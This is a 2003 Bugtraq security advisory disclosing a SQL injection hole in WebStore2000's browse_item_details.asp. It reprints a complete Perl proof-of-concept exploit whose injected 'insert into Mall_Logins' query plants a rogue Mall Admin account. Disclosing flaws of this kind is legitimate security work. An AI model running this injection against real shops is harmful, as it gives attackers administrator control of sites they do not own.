[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1054354012.3ed82a5cbd868@webmail.bosen.net>
Date: Sat, 31 May 2003 11:06:52 +0700
From: Bosen <mobile@...en.net>
To: bugtraq@...urityfocus.com
Subject: WebStore2000 SQL Injection Vulnerability & Exploit
1ndonesian Security Team (1st)
http://bosen.net/releases/
=======================================================================
=======================
Security Advisory
Advisory Name: WebStore SQL Injection Vulnerability & Exploit
Release Date: 05/10/2003
Application: WebStore2000 Version 6.0/ for ISP
Platform: Win32
Severity: High/Remote
BUG Type: SQL Injection
Author: Bosen <mobile@...en.net>
Discover by: Bosen <mobile@...en.net>
Vendor Status: Notified, see response below.
Vendor URL: http://www.webcortex.com/
Reference: http://bosen.net/releases/
Overview:
Webstores 2000 is a web based application.
To run it, you will need a computer running a web server and connected
to the internet.
You can either run it yourself or host it with an ISP.
Details:
Even the code encrypted, and the error couse by SQL injection handled
very good.
But however the SQL injection still works fine with this application.
The hole is on browse_item_details.asp.
Exploits:
ws2k-ex.pl
_START_
#!/usr/bin/perl -w
#This exploit create user with Mall Admin priv.
#You can login via /MallAdmin/
$pamer = "
1ndonesian Security Team (1st)
==============================
http://bosen.net/releases/
ws2k-ex.pl, WebStore2000 SQL Injection Proof of Concept
Exploit by : Bosen
Discover by : Bosen
Greetz to : AresU, TioEuy, syzwz, TioEuy, sakitjiwa, muthafuka
all #hackers\@centrin.net.id/austnet.org";
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
$| = 1;
print $pamer;
if ($#ARGV<3){
print "\n Usage: perl ws2k-ex.pl <uri>\n\n";
exit;
}
my $legend = "$ARGV[0]/browse_item_details.asp?Item_ID=";
$legend .= "''; insert into Mall_Logins values ('bosen','gembel')--";
my $bosen = LWP::UserAgent->new();
my $gembel = HTTP::Request->new(GET => $legend);
my $dodol = $bosen->request($gembel);
if ($dodol->is_error()) { printf " %s\n", $dodol->status_line;
} else { print "Alhamdulillah :P\n"; }
print "\n680165\n";
_EOF_
Vendor Response:
The vendor provided BUG Forum, we post the bug but not in details with
hope some
of the developer response. But until now, theres no response.
Recommendation:
The application is new release. And the old version also vulnerability.
So theres no recommendation until now.
1ndonesian Security Team (1st) Advisory:
http://bosen.net/releases/
About 1ndonesian Security Team:
1ndonesian Security Team, research and develop intelligent, advanced
application
security assessment. Based in Indonesia, 1ndonesian Security Team
offers best of
breed security consulting services, specialising in application, host
and network
security assessments.
1st provides security information and patches for use by the entire 1st
community.
This information is provided freely to all interested parties and may
be
redistributed provided that it is not altered in any way, 1st is
appropriately
credited and the document retains.
Greetz to:
AresU, TioEuy, sakitjiwa, syzwz,
and all 1ndonesian Security Team
Bosen <mobile@...en.net>
======================
Original document can be fount at http://bosen.net/releases/?id=30
-----------------------------------------------
This mail sent through http://webmail.bosen.net
Powered by blists - more mailing lists